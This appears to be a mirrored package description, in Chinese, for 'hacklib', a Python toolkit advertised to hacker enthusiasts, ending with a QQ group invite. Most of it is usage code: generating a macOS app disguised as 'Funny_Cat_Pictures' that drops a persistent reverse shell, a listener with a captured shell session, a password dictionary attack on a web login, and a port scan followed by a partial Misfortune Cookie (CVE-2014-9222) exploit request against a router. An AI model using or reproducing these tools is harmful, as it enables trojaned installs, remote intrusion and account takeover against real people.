使用python的黑客爱好者工具包。
hacklib的Python项目详细描述
hacklib是一个面向对网络安全感兴趣的黑客爱好者的python模块。目前正在积极开发中。
当前功能:
- 倒壳后门
- 用于几乎所有基于http/https表单的登录和http基本身份验证登录的通用登录客户端
- 端口扫描
- socks4/5代理刮削和隧道
生成后门有效负载(当前仅适用于Mac):
import hacklib
bd = hacklib.Backdoor()
# Generates an app that, when ran, drops a persistent reverse shell into the system.
bd.create('127.0.0.1', 9090, 'OSX', 'Funny_Cat_Pictures')
# Takes the IP and port of the command server, the OS of the target, and the name of the .app
外壳侦听器(与后门一起使用):
import hacklib
# Create instance of Server with the listening port
>>> s = hacklib.Server(9090)
>>> s.listen()
New connection ('127.0.0.1', 51101)
bash: no job control in this shell
bash$ whoami
leon
bash$
# Sweet!
hacklib.authclient的简单字典攻击示例:
import hacklib
ac = hacklib.AuthClient()
# Get the top 100 most common passwords
passwords = hacklib.topPasswords(100)
for p in passwords:
htmldata = ac.login('http://yourwebsite.com/login', 'admin', p)
if 'welcome' in htmldata.lower():
print 'Password is', p
break
使用hacklib.portscanner()发现和利用不幸cookie漏洞(CVE-2014-9222):
>>> import hacklib
# Discovery
>>> ps = hacklib.PortScanner()
>>> ps.scan('192.168.1.1', (80, 81))
Port 80:
HTTP/1.1 404 Not Found
Content-Type: text/html
Transfer-Encoding: chunked
Server: RomPager/4.07 UPnP/1.0
EXT:
# The banner for port 80 shows us that the server uses RomPager 4.07. This version is exploitable.
# Exploitation
>>> payload = '''GET /HTTP/1.1
Host: 192.168.1.1
User-Agent: googlebot
Accept: text/html, application/xhtml+xml, application/xml; q=09, */*; q=0.8
Accept-Language: en-US, en; q=0.5
Accept-Encoding: gzip, deflate
Cookie: C107351277=BBBBBBBBBBBBBBBBBBBB
欢迎加入QQ群-->: 979659372
